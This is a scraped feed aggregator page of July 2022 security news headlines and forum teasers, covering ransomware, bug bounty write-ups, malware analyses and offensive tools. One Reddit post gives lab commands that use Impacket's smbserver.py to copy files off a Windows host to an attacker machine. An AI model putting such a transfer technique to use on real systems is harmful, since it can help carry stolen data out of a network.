    来自Dr. Web的防病毒团队在Google Play商店中发现了一批充斥着广告软件和恶意软件的Android应用程序。
    美国大学发布重磅报告,揭露政府持续监视民众的阴谋
    美国乔治敦大学隐私与技术法律中心发布报告,揭露了美国入境和海关执法局建立监控系统,绕过法律近乎全息监控美国公民。
    Lockbit 再次攻击两地公共部门
    近期活动极为频繁的Lockbit勒索软件团伙近日又攻击了两处地方政府的设备。
    斗象科技再次登榜CCSIP 2022中国网络安全产业全景图
    斗象科技入选全景图12大类别,27项细分领域。
    微软:IIS 扩展正越来越多地用作 Exchange 后门
    攻击者正越来越多地使用恶意 Internet 信息服务 (IIS) Web 服务器扩展,对未打补丁的 Exchange 服务器部署后门。
    攻防演练专场精选议题视频上线 | CIS大会夏日版
    ​7月27日,CIS核心论坛——「实网对抗与攻防演练专场」部分议题上线公开课啦!
    在线阅读版:《2022中国软件供应链安全分析报告》全文
    尽管“Log4Shell”漏洞造成了空前的影响,但关键基础开源软件仍然没有引起足够的重视,我们应通过该漏洞事件举一反三,对类似Log4j2这样的关键基础开源软件进行系统化梳理,从基础底座层面进行漏洞排查和加固,针对性采取更强的安全防护措施。
  • Open

    Burp Suite certification: a year in review
    It’s been a year since we launched our Burp Suite Certified Practitioner exam, so we’ve been reflecting on some of the improvements and developments we’ve made across both our preparation materials an
  • Open

    Burp Suite certification: a year in review
    It’s been a year since we launched our Burp Suite Certified Practitioner exam, so we’ve been reflecting on some of the improvements and developments we’ve made across both our preparation materials an
  • Open

    Reflected Cross Site Scripting on User Agent-Dependent Response
    Hello folks, Continue reading on Medium »
  • Open

    HTML Injection via Email Share
    TikTok disclosed a bug submitted by lu3ky-13: https://hackerone.com/reports/1490311 - Bounty: $500
  • Open

    Rods and Cones, and EDR "blindness"
    I ran across an interesting post recently regarding blinding EDR on Windows systems, which describes four general techniques for avoiding EDR monitoring. Looking at the techniques, I've seen several of these techniques in use on actual, real world incidents. For example, while I was with the Crowdstrike Overwatch team, we observed a threat actor reach out to determine systems with Falcon installed; of the fifteen systems queried, we knew from our records that only four were covered. We lost visibility because the threat actor moved to one of the other eleven systems. I've also seen threat actors "disappear from view" when they've used the Powershell console rather than cmd.exe, or when the threat actor has shell-based/RDP access to systems and uses a GUI-based tool. EDR telemetry includes …

  • Open

    Inbound FW rules for “cybersecurity”?
    I am part of a team that’s standing up a lab network that resides on a corporate DMZ. The lab network will be isolated except for a handful of resources, all outbound. My lab has its own firewall because we want to lock it down. I told the network engineer I wanted all inbound ports blocked and he said he couldn’t do that. At first, he said it’s because of endpoint management software that the LAN users have. I pointed out that our network has a unique use case and was approved to not have endpoint management software loaded on any of the devices. Then he said that cybersecurity needs inbound ports to do their scans. This doesn’t make much sense to me so I pushed back and asked what ports exactly. He did not like that and just said “I’ve been doing this a long time”. Two questions: 1. Shouldn’t “all inbound ports blocked” be an optimal position from a security standpoint? 2. Are there any legitimate inbound ports that should be open for “cybersecurity”? Thanks for helping me learn! submitted by /u/pseudorandom_name [link] [comments]
    Question about Kerberoasting
    Hi, I created a simple lab with 1 VM as Domain Controller (windows 2019) and a few users/computers. I ran setspn -T domain.local and I found several SPns, but just one is in CN=Users, while others are mostly in CN=Computers. If I understand correctly, such SPN (computers, domain controller) aren't useful for Kerberoasting because they generally have very complex password, correct? I mean: Kerberoasting is meant to be a valid attack path only with SPN configured with regular user? thankyou submitted by /u/g-simon [link] [comments]
    Since the connection ID (CID) isn't encrypted in QUIC packets and QUIC allows you to keep existing connections even if your IP changes because it verifies the CID, isn't it easy to spoof a user?
    For example when someone is on the same network as you. submitted by /u/esp32s2 [link] [comments]
  • Open

    10 ways to approach a New Bounty target
    Poke around with the external surface and stuffs like external search and parameters on the outside and not really dive into learning the… Continue reading on Medium »
    Publicly Accessible Android Crash Reports Containing Sensitive Information
    Hello Guys, Continue reading on Medium »
    HTTP Parameter Pollution - It’s Contaminated Again
    Summary : Continue reading on Medium »
    IW Weekly #11: Hacking Nginx, eJPT2.0, Free Hacking Resources, OWASP API, and more
    Hey 👋 Continue reading on InfoSec Write-ups »
    Sensitive Data Exposure: Inspect Element berujung Inject MongoDB atlas Via Realm
    Sensitive Data Exposure vulnerabilities can occur when a web application does not adequately protect sensitive information from being… Continue reading on Medium »
    Redeemer HackTheBox Challenge Walkthrough
    Redeemer by HakcTheBox is indeed a very good challenge. So in this writeup/walkthrough we are going to see how we can pwn(hack) the… Continue reading on Medium »
  • Open

    Fake Vulnerability, Risk Aversion and You
    Article URL: https://www.residentcontrarian.com/p/fake-vulnerability-risk-aversion Comments URL: https://news.ycombinator.com/item?id=32243828 Points: 2 # Comments: 0
    Log4j Zero-Day Vulnerability: Everything You Need to Know About the Apache Flaw
    Article URL: https://www.spiceworks.com/it-security/vulnerability-management/articles/log4j-apache-vulnerability-everything-you-need-to-know/ Comments URL: https://news.ycombinator.com/item?id=32235197 Points: 2 # Comments: 1
  • Open

    Hunting For Mass Assignment Vulnerabilities Using GitHub CodeSearch and grep.app
    submitted by /u/l_tennant [link] [comments]
    Malicious IIS extensions quietly open persistent backdoors into servers
    submitted by /u/SCI_Rusher [link] [comments]
    Awesome Open-Source Adversary Simulation Tools
    submitted by /u/sciencestudent99 [link] [comments]
    CVE-2022-31813: Forwarding addresses is hard
    submitted by /u/0xdea [link] [comments]
    How to analyze Linux malware – A case study of Symbiote
    submitted by /u/CyberMasterV [link] [comments]
    Zyxel authentication bypass patch analysis (CVE-2022-0342)
    submitted by /u/0xdea [link] [comments]
    Bypass AMSI in local process hooking NtCreateSection
    submitted by /u/gid0rah [link] [comments]
    GitHub - InitRoot/wodat: Windows Oracle Database Attack Toolkit
    submitted by /u/InitRoot [link] [comments]
    US Government Review of the December 2021 Log4j Event
    submitted by /u/ScottContini [link] [comments]
    When Hypervisor Met Snapshot Fuzzing
    submitted by /u/Gallus [link] [comments]
  • Open

    Magnet Axiom Android Mobile Evidence
    Hi, are there other software out there can open/examine/export from the evidence files? Can Encase or Cellebrite PA accomplish this? submitted by /u/hw60068n [link] [comments]
  • Open

    Race condition in faucet when using starport
    Cosmos disclosed a bug submitted by cyberboy: https://hackerone.com/reports/1438052 - Bounty: $5000
  • Open

    Malicious IIS extensions quietly open persistent backdoors into servers
    submitted by /u/SCI_Rusher [link] [comments]
  • Open

    War in Ukraine / July 25
    Day 153: A strong South or strong East — is Russia’s dilemma Continue reading on Medium »
    STRATDELA Special Issue #1: Dark Eagle
    In this first Special Issue of my STRATDELA newsletter (https://www.getrevue.co/profile/STRATDELA) Continue reading on Medium »
    OPINION: OSINT, Ethics and Social Media
    Apparently, the internet [the people operating consoles that feed information in the form of human interaction through fiber optic cable]… Continue reading on Medium »
    How to identify your Email Credential Leaked Information
    Continue reading on Medium »
  • Open

    SecWiki News 2022-07-26 Review
    今日暂未更新资讯~ 更多最新文章,请访问SecWiki
  • Open

    SecWiki News 2022-07-26 Review
    今日暂未更新资讯~ 更多最新文章,请访问SecWiki
  • Open

    IW Weekly #11: Hacking Nginx, eJPT2.0, Free Hacking Resources, OWASP API, and more
    No content preview
    You MUST sanitize PHP mail() inputs — or else RCE!
    No content preview
    Mail Server Misconfiguration leads to sending a fax from anyone’s account on HelloFax (Dropbox BBP)…
    No content preview
  • Open

    IW Weekly #11: Hacking Nginx, eJPT2.0, Free Hacking Resources, OWASP API, and more
    No content preview
    You MUST sanitize PHP mail() inputs — or else RCE!
    No content preview
    Mail Server Misconfiguration leads to sending a fax from anyone’s account on HelloFax (Dropbox BBP)…
    No content preview
  • Open

    IW Weekly #11: Hacking Nginx, eJPT2.0, Free Hacking Resources, OWASP API, and more
    No content preview
    You MUST sanitize PHP mail() inputs — or else RCE!
    No content preview
    Mail Server Misconfiguration leads to sending a fax from anyone’s account on HelloFax (Dropbox BBP)…
    No content preview
  • Open

    Attackers Move Quickly to Exploit High-Profile Zero Days: Insights From the 2022 Unit 42 Incident Response Report
    The Unit 42 Incident Response Report includes insights on which software vulnerabilities are commonly exploited for initial access and a description of how attacker behavior around zero-day vulnerabilities is shifting. The post Attackers Move Quickly to Exploit High-Profile Zero Days: Insights From the 2022 Unit 42 Incident Response Report appeared first on Unit 42.
  • Open

    FreeBuf早报 | 软件问题导致大众 CEO 遭到解雇;UEFI 主板 BIOS 木马发现新变种
    第二季度整个网络安全领域的风险投资下滑至 34 亿美元,季度环比下降近 40%。
    基于开源蜜罐的威胁诱捕 | FreeBuf甲方社群直播回顾
    7月21日,某物联网公司安全专家江鹏(安平不太平)在FreeBuf甲方社群第七期内部直播中担任主讲嘉宾,分享基于开源蜜罐的威胁诱捕。
    网安大国系列 | 美国如何成为网络世界的霸主
    美国发起的众多网络攻击叠加在一起,显示了其背后强大的网络安全力量,逐步走向了网络霸主的宝座。
    FileWave MDM漏洞可能允许威胁行为者入侵上千家企业
    Claroty研究人员在FileWave MDM产品中发现了两个漏洞。
    黑客利用PrestaShop零日漏洞入侵网店
    PrestaShop团队上周五发出紧急警告,有黑客正在针对使用PrestaShop平台的网站。
    Lockbit 勒索软件团伙声称入侵了意大利税务局
    勒索软件团伙 Lockbit 声称已经从意大利税务局窃取了 78GB 的文件。
    Rust编码的信息窃取恶意软件源代码公布,专家警告已被利用
    该恶意软件的开发者称,仅用6个小时就开发完成,相当隐蔽,VirusTotal的检测率约为22%。
    【热点讨论】2022攻防演练情报追踪
    攻防来袭,FreeBuf联合漏洞盒子情报星球为大家送上新鲜及时的情报分享~
    上海启动2022年网络安全产业创新攻关目录成果征集
    上海市经济和信息化委员会组织编制了“2022年上海市网络安全产业创新攻关目录”。

  • Open

    Introduction
    Hello guys my name is caleb jephuneh and welcome to my blog Continue reading on Medium »
    Sensitive Data Exposure: Mengambil alih semua akun, akunmu = akunku.
    Sensitive Data Exposure vulnerabilities can occur when a web application does not adequately protect sensitive information from being… Continue reading on Medium »
    OPEN REDIRECT VULNERABILITIES: ESCALATING TO XSS
    This article was originally published at BePractical Continue reading on Medium »
    Mail Server Misconfiguration leads to sending a fax from anyone’s account on HelloFax (Dropbox BBP)…
    Hi Everyone!, Continue reading on InfoSec Write-ups »
    Mail Server Misconfiguration leads to sending a fax from anyone’s account on HelloFax (Dropbox BBP)…
    Hi Everyone!, Continue reading on Medium »
    DoS worth $650 ? Interesting right!
    Hey Guys, my name is Sagar Sajeev. This is my second writeup and I would like to share how I was rewarded with a bounty of $650 for a… Continue reading on Medium »
    How I Gained Access To A Finance Company’s Accounts (Session Hijacking)
    In a web application security test, I gained access to hundreds of accounts that have belonged to a finance company. The vulnerability… Continue reading on Medium »
    MSA Weekly 5 - “How to Get Sensitive Data Exposure on Web Application”
    Kategori OWASP Continue reading on Medium »
    $1.333 For Account Takeover Via Reset Password
    Assalamualaikum, Halo Bug Hunter! Kali ini gw nemu celah keamanan yang Sangat Critical pada salah satu Aplikasi. Tanpa basa basi, langsung… Continue reading on Medium »
    Open Redirect vulnerability in igp.com
    Hello everyone, I am Vignesh, a 20-year-old Security Researcher from TamilNadu, India. Continue reading on Medium »
  • Open

    Automate google hacking database by python script.
    In this tutorial we have simple python script which will ask for url and use certain dork to search in google and finally show the result… Continue reading on Medium »
    The importance of educating Security Personnel and Intelligence Analysts about biases
    Bias is a topic that many industries like to avoid, and the security and intelligence industries are no exception. However, there is a… Continue reading on Medium »
    Social Media Investigations and Monitoring for Risk Mitigation Purposes
    The use of social media and the way it affects our lives and businesses have brought a new challenge to the security industry and the… Continue reading on Medium »
    War in Ukraine / July 22–24
    Day 152: The battle for Vuhlehirska Power Station Continue reading on Medium »
    Searching YouTube videos by coordinates
    Youtube needs no introduction — everybody knows what it is. But for us, OSINT enthusiasts, it is much more than just a video platform… Continue reading on Medium »
    OSINT ON SOCIAL MEDIA ACCOUNTS
    USING SHERLOCK TOOL TO CONDUCT OSINT Continue reading on Medium »
  • Open

    Finding Flaws in FileWave MDM
    submitted by /u/derp6996 [link] [comments]
    CosmicStrand: the discovery of a sophisticated UEFI firmware rootkit
    submitted by /u/surrealisticpillow12 [link] [comments]
    Attack Chain Déjà-vu: The infection vector used by SVCReady, Gozi and IcedID
    submitted by /u/OwnPreparation3424 [link] [comments]
    Pulsar — an open-source runtime security framework powered by Rust & eBPF for IoT
    submitted by /u/JDBHub [link] [comments]
    PART 2: How I Met Your Beacon - Cobalt Strike
    submitted by /u/Gallus [link] [comments]
    Multiple vulnerabilities in Nuki smart locks
    submitted by /u/Gallus [link] [comments]
    Since Microsoft patched PPLDump's exploit I'm open sourcing RIPPL, a a tool based off PPLDump which enabled more offensive capabilities against PPL processes like EDRs - @last0x00
    submitted by /u/last0x00 [link] [comments]
  • Open

    Node.js - DLL Hijacking on Windows
    Internet Bug Bounty disclosed a bug submitted by yakirka: https://hackerone.com/reports/1636566 - Bounty: $3000
  • Open

    Tales from the onsite
    This blog will contain all sorts of social engineering shenanigans, mainly from onsite assessments. Continue reading on Medium »
    How I chained multiple CVEs & other vulnerabilities during an RTO to pwn the company remotely
    The exploitation of Pulse VPN application to gain full control on the VPN server and pivot across the cloud infrastructure. Continue reading on Medium »
    How I chained multiple CVEs & other vulnerabilities during an RTO to pwn the company remotely
    The exploitation of Pulse VPN application to gain full control on the VPN server and pivot across the cloud infrastructure. Continue reading on Medium »
    Weaponizing DLL Hijacking with Custom Powershell C2
    Is DLL Hijacking dangerous? How can DLL Hijacked be used in real-life scenario? Hold me keyboard! Continue reading on Medium »
  • Open

    Docker: Creating a Pivoting Lab and Exploiting it
    https://medium.com/p/a66646dc2cf3 submitted by /u/Protection-Mobile [link] [comments]
    Pivoting with Socks and Proxychains
    submitted by /u/Clement_Tino [link] [comments]
    PART 2: How I Met Your Beacon - Cobalt Strike - @MDSecLabs
    submitted by /u/dmchell [link] [comments]
  • Open

    SecWiki News 2022-07-25 Review
    PDGraph:针对不安全项目依赖的大规模实证研究 by ourren NeuVector----功能丰富且强大的容器安全开源软件 by ourren 实时缺陷预测工具调研 by ourren 缓冲区溢出漏洞那些事:C -gets函数 by SecIN社区 SecWiki周刊(第438期) by ourren 更多最新文章,请访问SecWiki
  • Open

    SecWiki News 2022-07-25 Review
    PDGraph:针对不安全项目依赖的大规模实证研究 by ourren NeuVector----功能丰富且强大的容器安全开源软件 by ourren 实时缺陷预测工具调研 by ourren 缓冲区溢出漏洞那些事:C -gets函数 by SecIN社区 SecWiki周刊(第438期) by ourren 更多最新文章,请访问SecWiki
  • Open

    IAM-Deescalate: An Open Source Tool to Help Users Reduce the Risk of Privilege Escalation
    We developed an open source tool, IAM-Deescalate, to help mitigate the privilege escalation risks of overly permissive identities in AWS. The post IAM-Deescalate: An Open Source Tool to Help Users Reduce the Risk of Privilege Escalation appeared first on Unit 42.
  • Open

    Imaging the impossible? A Samsung Galaxy Book Go
    Hi all! I have a samsung galaxy book go (np340xla) that so far feels impossible to image and I was wondering if anyone had any suggestions. This is what I have tried so far: Remove the disk: Can't, it's soldered on Boot from Paladin/Kali/Ubuntu/Mint: USB won't appear as an option Secure boot is already disabled (was never enabled) BIOS is the most minimal bios I have ever seen UEFI option from BIOS? non existant Cant boot from anything else than the windows boot manager or an option called "USB: hard disk" (it goes back to the disk) I have used USB-C, USB-3, USB-2, powered USB hub I have tried the Linux distros in both UEFI and I can reach the "recovery" option from Windows, but that won't get me anywhere than deleting the disk. Any other ideas? At this point, I will accept ANYTHING as long as I can image this laptop. Just in case it is asked: I don't have the pin (: submitted by /u/agente_99 [link] [comments]
    Best site for memory forensic test
    Hi. there are plenty of sites that test you in network forensics that provide you with a pcap file to analyze and ask you questions to answer. Are there any sites like that for memory forensics that you like? submitted by /u/antmar9041 [link] [comments]
  • Open

    FreeBuf早报 | 数字人民币可满足个人匿名支付需求;谷歌开除称机器人有知觉的工程师
    工程师坚称谷歌的 LaMDA 聊天机器人具有感知能力,谷歌以违反危害商业机密的“就业和数据安全政策”为由将其解雇。
    IDC网络威胁检测与响应市场报告,斗象科技增速领跑
    斗象科技入选IDC报告,斗象PRS-NTA产品市场增速亮眼
    QBot通过DLL侧载方式感染设备
    Windows7的DLL侧载缺陷近期被QBot恶意软件利用。
    借助SmokeLoader恶意软件分发,Amadey重出江湖
    新版本的Amadey Bot恶意软件使用软件破解和注册机站点作为诱饵,正通过SmokeLoader恶意软件分发。
    黑客正以3万美元价格出售 540万个Twitter帐户数据
    黑客表示这些数据涵盖了一些知名人士、公司机构以及随机的普通用户的账户信息。
    数字安全巨头 Entrust 遭遇勒索攻击
    数字安全巨头Entrust已经承认,自己遭受了网络攻击,攻击者破坏了其内部网络,并窃取了一定规模的数据。
  • Open

    This is why you should ALWAYS check for Race Conditions (even in JavaScript)
    No content preview
  • Open

    This is why you should ALWAYS check for Race Conditions (even in JavaScript)
    No content preview
  • Open

    This is why you should ALWAYS check for Race Conditions (even in JavaScript)
    No content preview
  • Open

    Differentiate three types of eBPF redirections (2022)
    TL; DR There are three types of eBPF redirection fashions in Linux kernel that may confuse developers often: bpf_redirect_peer() bpf_redirect_neighbor() bpf_redirect() This post helps to clarify them by digging into the code in history order, and also discusses usages & related problems in real world. TL; DR 1 The foundation: bpf_redirect(), 2015 1.1 The documentation Description Comparison with bpf_clone_redirect() 1.2 Kernel implementations/changes 1. Add TC action type TC_ACT_REDIRECT 2. Add new BPF helper & syscall 3. Process redirect logic in TC BPF 1.3 Call stack 2 Egress optimization: bpf_redirect_neighbor(), 2020 2.1 Comparison with bpf_redirect() 2.2 Kernel implementations/changes 1. Modify skb_do_redirect(), prefer the new one whenever available 2.…

  • Open

    TryHackMe — NahamStore Part 1 | XSS (Tasks 3&4) —  (Medium)
    Hello again and welcome to another one of my CTF write-up attempts. Since I have recently been trying to step up my web app pentesting… Continue reading on Medium »
  • Open

    Analyzing raw image
    This may seem like a stupid question but I’ve been trying to figure this out all day and I haven’t had a clue. Im using PowerShell to open Volatility and I want to analyze a raw image I have saved on my downloads folder on my Windows computer. How can I tell volatility via PowerShell to open that image? submitted by /u/1rangusN1dangus [link] [comments]
  • Open

    ProtectMyTooling – Don’t detect tools, detect techniques – mgeeky's lair
    submitted by /u/dmchell [link] [comments]
  • Open

    3 things to do if you want to be a penetration tester
    Now that I would consider myself to no longer be a beginner penetration tester, I feel like it is a great time to reflect on my personal… Continue reading on Medium »
    start hacking carrier part 4 | create a custom word list for you target …
    is a pain follow these steps to create custom word list for your target if you are new in bug bounty and you want to learn from scratch… Continue reading on Medium »
    ONERARE TESTNET QUICK GUIDE 70,000 $ORARE AS REWARD
    OneRare is creating the world’s first Foodverse for the Global Food Industry. Our first launch is the Gaming Zone, celebrating Dishes from… Continue reading on Medium »
    Privilage Escalation
    Assalam O Alaikum. Alhamdullillah! Continue reading on Medium »
    Red vs Blue Team Project
    Assessment, Analysis, and Hardening of a vulnerable system. This report includes a Red Team Security Assessment, a Blue Team Log Analysis… Continue reading on Medium »
    A Developer’s Nightmare: Story of a simple IDOR and some poor fixes worth $1125
    Hello Everyone, I hope you all are doing good. This is my second blog and in this will be covering a finding of a Simple IDOR followed by… Continue reading on Medium »
    MSA Weekly 5 — “How to Get Sensitive Data Exposure on Web Application”
    Dalam dunia pentesting ada sebuah standar yang digunakan sebagai acuan atau standar keamanan yang mungkin para pembaca sudah mengetahuinya… Continue reading on Medium »
    Why Did I Fail At Bug Bounties?
    Hello folks, Continue reading on Medium »
    Host Header injection to redirect in live website
    Hi this is my fifth blog and if you want to read my first blog(about xss bug) then click on this link: My First Bug Bounty. Continue reading on Medium »
    The 6 UGLY TRUTHS about Security Certifications
    Here we are again, with yet another (possibly) controversial topic. This time is about security certifications. Regardless if you are in… Continue reading on Medium »
  • Open

    CVE-2022-27781: CERTINFO never-ending busy-loop
    Internet Bug Bounty disclosed a bug submitted by sybr: https://hackerone.com/reports/1606039 - Bounty: $480
  • Open

    MFA validity through multiple IP addresses
    Hello, I got an alert saying that an O365 OWA account was being logged in from multiple IP addresses. On checking, I found that while the user was in India and had MFA enabled, the logins were happening through over 100 separate IP addresses in Nigeria. The user may have used Microsoft Authenticator to accidentally click yes to one of the logins. How do these attackers manage to keep sessions alive over multiple computers and over the period of a week? Is there a change that needs to be made in the O365 admin console to protect against this? Say ask for the password every 12 hours and the same for MFA. I am checking the audit logs and clearly the attacker read some of the users emails, but no harm that we can find yet. submitted by /u/indianadmin [link] [comments]
    Does anyone have any extra SANS practice tests available?
    Does anyone have any extra SANS practice tests (SANS 522) available? submitted by /u/herbertisthefuture [link] [comments]
  • Open

    Assets for geocities.restorativland.org (mostly screenshots)
    submitted by /u/ilikemacsalot [link] [comments]
    'alternative living' stuff
    submitted by /u/PM_ME_TO_PLAY_A_GAME [link] [comments]
    Fractals
    submitted by /u/PM_ME_TO_PLAY_A_GAME [link] [comments]
    Movies but what language are they?
    http://www.konectar1.com/yesi/ http://www.netfrg.com/mov/ submitted by /u/RainyAbrar [link] [comments]
    Movies
    Not sure about speed. Didn't go through it all, hence marking NSFW. http://jotokusi.com/ftp/ Not sure if already posted "site:reddit.com/r/opendirectories http://jotokusi.com/ftp/" -- turned up no result to me. submitted by /u/RainyAbrar [link] [comments]
  • Open

    The End of PPLdump
    submitted by /u/0xdea [link] [comments]
    Investigating a Hacked WordPress site on Linode. Step by step.
    submitted by /u/nykzhang [link] [comments]
  • Open

    SecWiki News 2022-07-24 Review
    今日暂未更新资讯~ 更多最新文章,请访问SecWiki
  • Open

    SecWiki News 2022-07-24 Review
    今日暂未更新资讯~ 更多最新文章,请访问SecWiki
  • Open

    History Repeats Itself
    It's said that those who do not study history are doomed to repeat it. I'd suggest that the adage should be extended to, "those who do not study history and learn from her lessons are doomed to repeat it." My engagement with technology began at an early age; in the early '80s, I was programming BASIC on a very early IBM-based PC, the Timex-Sinclair 1000, and Mac IIe. By the mid-'80s, I'd programmed in BASIC and Pascal on the TRS-80. However, it wasn't until I completed my initial military training in 1990 that I began providing technology as a service to others; I was a Communications Officer in the Marine Corps, providing trained technical Marines, servicing technical assets, in support of others. I had been taught about the technology...radios, phones, switchboards, etc...and troublesho…
  • Open

    How to Become an OSINT Master: Tips, Tricks, and Tools — Part 2
    Hey Folks! I hope you liked part -1 of my OSINT series. In this blog, we will discuss some excellent and professional techniques of… Continue reading on Medium »
    SPY NEWS: 2022 — Week 29
    Summary of the espionage-related news stories for the Week 29 (July 17–23) of 2022. Continue reading on Medium »
  • Open

    Red vs Blue Team Project
    Assessment, Analysis, and Hardening of a vulnerable system. This report includes a Red Team Security Assessment, a Blue Team Log Analysis… Continue reading on Medium »
  • Open

    谁动了我的DevOps:DevOps风险测绘
    DevOps市场规模在2021 年已超过70 亿美元,并有望在2022 年至2028 年间,以超过20% 的复合年增长率增长。
    攻击者在黑客论坛上推广新版本Redeemer 勒索软件
    威胁攻击者正在黑客论坛上推广新版本 Redeemer(救赎者)勒索软件构建器。
  • Open

    Pivoting Techniques with THM Wreath
    No content preview
  • Open

    Pivoting Techniques with THM Wreath
    No content preview
  • Open

    Pivoting Techniques with THM Wreath
    No content preview

  • Open

    Coursera Specializations - Are they worth it in Forensics/Cyber Incident Response?
    Hey all - general research. Are certification/specializations from Coursera (with capstone projects or practicals) worth it? I am currently studying for CompTIA Sec+ (10+ experience working in IT/incident responses) and working in an analyst role currently with security IT work incorporated, I'd like to get additional experience, particularly in Computer/Digital Forensics and upskill in my Cyber Response practices. I wanted to specialize in a niche, as a supplement to CompTIA Sec+ studies. - How are the following courses, would this be worth it (via the company InfoSec)? Cyber Incident Response Specialization Computer Forensics Specialization - Are there any solid books I could purchase that cover concepts for Computer/Digital Forensics and Cyber Incident Response? For example, I was checking out this book as a starting point: Digital Forensics and Incident Response Thank you for any advice in advance. submitted by /u/sora1493 [link] [comments]
    Remote work question
    Hi, i'm currently looking at getting into this field, and I wanted to ask, what are the chances of me, a european, getting a fully remote IR job in the U.S? Will employers greatly prefer a candidate based in the U.S even if the job can be done fully remote? As a foreigner I don't qualify for security clearance, would this be a big barrier in getting a job? Thank you in advance. submitted by /u/Frederic_-104 [link] [comments]
    Extracting all images and videos from Autopsy using python
    Hi, I have a quick question concerning writing something in python to extract all images and videos from Autopsy? I am halfway through the code to filter files to the newly created folders depending on the file extensions but currently this only picks up files from a folder not directly from Autopsy. Is it even possible to link it? and two if it is possible how would I go about linking it? If you need any more information please ask, I am only building this as the last three projects I've worked on have all been over 80,000 files and easier to filter out the useless files when they have been assigned to a folder. Thanks submitted by /u/sudo_oth [link] [comments]
  • Open

    Help understanding computer vulnerability to malware and hacks
    ​ OS: Windows 11 Hi all, I am a bit of a hypochondriac but with viruses etc always thinking I'm going to get hacked or I already am and someone has control over my pc. So I want to ask the following: Are drive by downloads, i.e. unintended dangerous file downloads when I visit a dodgy website and popups come up and tabs open and/or close possible on Google Chrome? If so how can I find out if my computer is infested? Is it possible for a virus or malicious files or software to attach itself to personal files on my pc or can I safely move my personal files to an external drive and format my pc? Does a windows full scan detect the above mentioned? Thanks a lot for any help! submitted by /u/lassolass [link] [comments]
    how can a hacker enter to your pics to then use them to blackmail you?
    Knew from someone who was blackmailed with some di*k pics, and wonder how to avoid this kind of situation submitted by /u/MoteCnHuesillo [link] [comments]
    Trying to help a friend who has a Deadbolt issue. No idea what I'm doing!
    So a friend of mine has their own business and they tried to attach a picture to an email and they noticed that rather than .jpeg, it read .deadbolt (I think). I've looked it up and it just says to update the firmware but they will still need to pay the ransom to get any encrypted files back. I just wondered if anyone knows anything about this and if they can tell me if what I've read is right or if anyone has any further ideas or suggestions? submitted by /u/Silver020 [link] [comments]
  • Open

    Twitter Vulnerability Exposes Data from 5.4M Accounts
    Article URL: https://restoreprivacy.com/twitter-vulnerability-exposes-5-million-accounts/ Comments URL: https://news.ycombinator.com/item?id=32208204 Points: 1 # Comments: 0
    Verified Twitter Vulnerability Exposes Data from 5.4M Accounts
    Article URL: https://restoreprivacy.com/twitter-vulnerability-exposes-5-million-accounts/ Comments URL: https://news.ycombinator.com/item?id=32201333 Points: 4 # Comments: 0
  • Open

    Transferring files from windows to kali using Impacket smbserver.py doesn't work?
    Transferring files from kali to windows is easy with something like python http.server. What about transferring files from windows to kali? I found very useful blog post here and attempted to do similar thing with Impacket smbserver.py https://blog.ropnop.com/transferring-files-from-kali-to-windows/#smb Setup Kali: 172.16.1.10 Windows: 172.16.1.50 Run smbserver on Kali with Impacket smbserver.py └─$ /usr/share/doc/python3-impacket/examples/smbserver.py share /tmp Impacket v0.9.24 - Copyright 2021 SecureAuth Corporation [*] Config file parsed However, whenever I try on Windows, I'm getting "System error 53 has occurred, The network path was not found" as follows: C:\>net view \\172.16.1.10\ System error 53 has occurred. The network path was not found. Here is the message on Impacket smbserver.py [*] Incoming connection (172.16.1.50,56201) [*] Closing down connection (172.16.1.50,56201) [*] Remaining connections [] Then, I tried again with \share, but still getting the same error C:\>net view \\172.16.1.10\share System error 53 has occurred. The network path was not found. What's wrong and what should I do to make this right? submitted by /u/w0lfcat [link] [comments]
  • Open

    GUIDE: Debunking disinformation about tanks forming a bank barricade in China.
    Open source investigation often can be used as a weapon to fight disinformation that is spread on social-media. One of them that stood out… Continue reading on Medium »
    TryHackMe | Sakura Room
    TryHackMe’s Sakura Room. From finding an image left by an attacker to finding their town. Continue reading on Medium »
  • Open

    SecWiki News 2022-07-23 Review
    今日暂未更新资讯~ 更多最新文章,请访问SecWiki
  • Open

    SecWiki News 2022-07-23 Review
    今日暂未更新资讯~ 更多最新文章,请访问SecWiki
  • Open

    Bug Bounty: Hunting Open Redirect Vulnerabilities For $$$
    This article was originally published at BePractical Continue reading on Medium »
    Un3xpected DoS Attack on Profile Pictur3
    Hey Everyone, Hope y’all doing gr3at and aw3some! Continue reading on InfoSec Write-ups »
    My Bug Bounty Resources
    Hello Amazing People, Continue reading on System Weakness »
    $$$ bounty in less 3 minutes from a google dork
    ~ Hi Bug Bounty Hunters & CyberSecurity folks!!! It’s been long since i dropped a bug bounty writeup. Continue reading on Medium »
    CyberTalents BootCamp 2022 #fisher
    ~ Steiner254 says … Congratulations!!! For making it to CyberTalents BootCamp 2022. Good Luck in your journey :) Continue reading on Medium »
    YACHTINGVERSE STAKING TESTNET CAMPAIGN (QUICK GUIDE)
    YachtingVerse is an open-world marine theme massive multi-users platform built on the BNB Beacon Chain. This platform will bring together… Continue reading on Medium »
    SecStory: How I Found Multiple P1 Vulnerabilities without Recon
    Hi folks.. Nowadays there are so many bug hunting story over there on internet, but for me I named this as my “SecStory” it stands for… Continue reading on Medium »
    Meow Starting Point HackTheBox Walkthrough
    Meow is a very good Challenge by HackTheBox for starting to practice Hacking skillls. So without any delays let’s get into it. Continue reading on Medium »
  • Open

    Un3xpected DoS Attack on Profile Pictur3
    No content preview
    I mean, IDOR is NOT only about others ID
    No content preview
    How to NOT keep your Active Directory safe.
    No content preview
    This one trick will exploit URL parsers to perform SSRF
    No content preview
    This is why you should NEVER use the eval() function — RCE!
    No content preview
    Be Careful of User Input. You will get hacked.
    No content preview
    Beware of Ghosts!! — when CVE-2018–16509 leads to Remote Code Execution.
    No content preview
  • Open

    Un3xpected DoS Attack on Profile Pictur3
    No content preview
    I mean, IDOR is NOT only about others ID
    No content preview
    How to NOT keep your Active Directory safe.
    No content preview
    This one trick will exploit URL parsers to perform SSRF
    No content preview
    This is why you should NEVER use the eval() function — RCE!
    No content preview
    Be Careful of User Input. You will get hacked.
    No content preview
    Beware of Ghosts!! — when CVE-2018–16509 leads to Remote Code Execution.
    No content preview
  • Open

    Un3xpected DoS Attack on Profile Pictur3
    No content preview
    I mean, IDOR is NOT only about others ID
    No content preview
    How to NOT keep your Active Directory safe.
    No content preview
    This one trick will exploit URL parsers to perform SSRF
    No content preview
    This is why you should NEVER use the eval() function — RCE!
    No content preview
    Be Careful of User Input. You will get hacked.
    No content preview
    Beware of Ghosts!! — when CVE-2018–16509 leads to Remote Code Execution.
    No content preview
  • Open

